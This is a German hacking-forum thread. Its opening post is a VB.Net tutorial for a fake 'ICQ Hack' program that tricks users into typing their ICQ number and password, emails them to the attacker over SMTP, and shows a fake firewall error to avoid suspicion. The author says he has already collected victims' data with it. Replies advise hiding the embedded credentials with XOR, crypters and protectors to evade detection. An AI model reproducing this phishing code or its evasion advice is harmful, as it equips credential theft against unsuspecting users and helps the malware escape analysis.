Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 14
  1. #1
    Fortgeschrittener Avatar von Kohlensäure
    Registriert seit
    30.10.2008
    Beiträge
    34

    Standard [VB.Net][Text-Tut]Einfaches Phishing Tool

    Hallo Free-Hack,
    heute möchte ich euch zeigen wie ihr ein einfaches Phishing Tool erstellt.

    Was ihr braucht ?
    -Ein Gehirn
    -Ein Compiler
    -Grundkenntnisse in VB.Net

    So nun fangen wir an.

    Ihr erstellt euch erstmal eine neue Windows Applikation und nennt diese z.B. "ICQ Hack".
    Dann fügt ihr 2 Labels ein und 2 Textboxe, 1 Button. Ihr benennt diese erstmal um in
    :
    -Label1 = ICQ Nummer
    -Label2 = ICQ Passwort
    -Button1 = Verbinden

    Nun stellt ihr diese so in das Formular wie euch es passt Vielleicht fügt ich noch paar nette Bildchen ein damit das Tool "echter" wirkt.

    Nun gehen wir zum Coding Teil !
    Als erstes ändert ihr bei der Textbox die zum Password gehört die Eigenschaften, einfach Textbox markieren und dann "Password Char" suchen und dort "*" einfügen (ohne "). Nun geht ihr auf den Button und geht ins Coding Fenster. Erstmal sollte es so aussehen :
    Code:
    Public Class Form1
    
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    End Class
    Nun geht ihr zu Public Class Form1 und schreibt dadrüber folgendes herein :
    Code:
    Imports System.Net.Mail
    Imports System.Net
    Und nun zum Button, dort schreibt ihr dies wie folgt
    Code:
    Dim text As String
    text = "ICQ ID: " & TextBox1.Text & "ICQ Password: " & TextBox2.Text
    Nun damit leitet ihr sozu ein das die EMail die Daten bekommt die in die Textbox1 und 2 eingetragen werden, Textbox1 ist die ICQ Nummer, Textbox2 das ICQ Passwort. Nun fügen mir eine kleine Fehler Meldung rein damit die Person denkt das dass Tool KEIN Fake ist.
    Code:
    If TextBox1.Text = "" Then
    MsgBox("Bitte geben sie ihren ICQ Nummer ein.", MsgBoxStyle.Critical)
    End If
    If TextBox2.Text = "" Then
    MsgBox("Bitte geben sie ihr Passwort ein.", MsgBoxStyle.Critical)
    End If
    Nun sollte alles bis jetzt so aussehen
    Code:
    Imports System.Net.Mail
    Imports System.Net
    Public Class Form
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            Dim text As String
            text = "ICQ ID: " & TextBoxID.Text & "ICQ Password: " & TextBoxPass.Text
            If TextBox1.Text = "" Then
                MsgBox("Bitte geben sie ihren Flyff ID ein.", MsgBoxStyle.Critical)
            End If
            If TextBox2.Text = "" Then
                MsgBox("Bitte geben sie ihr Passwort ein.", MsgBoxStyle.Critical)
            End If
    End Class
    Nun kommt das eigentliche worauf wir hinaus wollen ihr fügt nun folgendes beim Button1 Code hinein:
    Code:
            Dim eMail As New Net.Mail.SmtpClient("smtp.web.de")
            eMail.Credentials = New NetworkCredential("DEINEEMAIL@web.de", "DEINPW")
            eMail.Send("DEINEEMAIL@web.de", "DEINEEMAIL@web.de", "Betreff", text)
            MsgBox("Ihre Firewall blockiert das Programm", MsgBoxStyle.Critical)
    Nun müsst ihr das editieren und eure Email dort einfügen, bei DEINEEMAIL und dein Passwort von dem Email Account, es geht eigentlich nur mit Web.de oder Gmx, falls ihr Gmx wählt solltet ihr noch den SMTP Server ändern. Nun sieht alles so aus !
    Code:
    Imports System.Net.Mail
    Imports System.Net
    Public Class Form
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            Dim text As String
            text = "ICQ ID: " & TextBoxID.Text & "ICQ Password: " & TextBoxPass.Text
            If TextBox1.Text = "" Then
                MsgBox("Bitte geben sie ihren Flyff ID ein.", MsgBoxStyle.Critical)
            End If
            If TextBox2.Text = "" Then
                MsgBox("Bitte geben sie ihr Passwort ein.", MsgBoxStyle.Critical)
            End If
            Dim eMail As New Net.Mail.SmtpClient("smtp.web.de")
            eMail.Credentials = New NetworkCredential("DEINEEMAIL@web.de", "DEINPW")
            eMail.Send("DEINEEMAIL@web.de", "DEINEEMAIL@web.de", "Betreff", text)
            MsgBox("Ihre Firewall blockiert das Programm", MsgBoxStyle.Critical)
    End Sub
    End Class
    Ich hoffe es hat euch ein bisschen geholfen, ich konnte das leider nicht so gut erklären ich hoffe ihr versteht es wenigstens auch so
    Wenn ihr Fehler entdeckt, dann bitte ich euch dies zu Posten, denn aus Fehlern lernt man, und ich bin bereit zu lernen

    :p
    Meine Signatur wurde entfernt

  2. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    BlackCobra (12.03.2010), Bullterrier (12.03.2010)

  3. #2
    Anfänger Avatar von BlackCobra
    Registriert seit
    04.08.2008
    Beiträge
    807

    Standard

    Gibts da nicht noch SMTP-exeptions?

  4. #3
    Fortgeschrittener Avatar von Kohlensäure
    Registriert seit
    30.10.2008
    Beiträge
    34

    Standard

    Also ich habe es so gemacht und habe damit einige Daten schon gesammelt
    Das einzige Problem ist das man das Programm crypten muss da man sonst im Hex die Email adresse und das Passwort sieht
    Meine Signatur wurde entfernt

  5. #4
    Anfänger Avatar von BlackCobra
    Registriert seit
    04.08.2008
    Beiträge
    807

    Standard

    Oder du XOR'st das pw und lässt es zur laufzeit in eine Variable decrypten.

  6. #5
    Fortgeschrittener Avatar von Kohlensäure
    Registriert seit
    30.10.2008
    Beiträge
    34

    Standard

    Sorry aber soweit bin ich glaub ich nicht bzw. habe mich NOCH nicht damit beschäftigt, sollte ich die nächste Zeit mal tuhen

    p.s. Danke für den Hinweis !
    Meine Signatur wurde entfernt

  7. #6
    Sobig Wurm Avatar von Thunderstorm
    Registriert seit
    28.07.2007
    Beiträge
    211

    Standard

    Mhh nettes kleines TUT ^^
    Könnte man ja auch mal mit FTP Upload machen
    Aber weres es nicht eig besser wenn man die beiden TXT boxen in 2 string speichert ??
    Geändert von Thunderstorm (13.03.2010 um 14:32 Uhr)

  8. #7
    Trojaner
    Registriert seit
    07.04.2010
    Beiträge
    77

    Standard

    Ich bin noch relativ neu im Gebiet des Hackens etc... habe allerdings schon ein wenig Programmiererfahrung im .NET Framework. Es reicht also mit einem FUD Crypter das Programm zu crypten, damit man nicht in den Quelcode und somit auch nicht die eMail Adresse einsehen kann?

    Die Möglichkeit mit der varibalen Speicherung des Passworts hört sich ebenfalls interessant an.

  9. #8
    CIH-Virus Avatar von krusty
    Registriert seit
    12.10.2008
    Beiträge
    445

    Standard

    ich denke nal, werd strings unverschlüselt in .net programmen stehen lässt ist selber schuld.
    Man sollte das ganze Programm dann noch mit einem Protector von decompilierung schützen, denn dann hilft die verschlüsselung auch nichts mehr.

  10. #9
    Trojaner
    Registriert seit
    07.04.2010
    Beiträge
    77

    Standard

    Also verschlüsseln und nen Protector dahinter... Ist das verschlüsseln überhaupt notwendig, wenn der Quelcode nicht dekompiliert werden kann ? Sind die Mailadresse und das Passwort etwa im Hex oder Dergleichen einsehbar? Weil dann wäre die Lösung hier ausm TUT ja eher weniger gut.
    Geändert von Chazer2010 (08.04.2010 um 16:07 Uhr)

  11. #10
    Good Time W32.FunLove Avatar von Planxty
    Registriert seit
    22.01.2008
    Beiträge
    988

    Standard

    vb.net ist meines wissens eins der am leichtesten zu decompilenden sprachen ^^ und ja es sind auch stirings auch im plain, wenn man sie nicht verschlüsselt

Seite 1 von 2 12 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •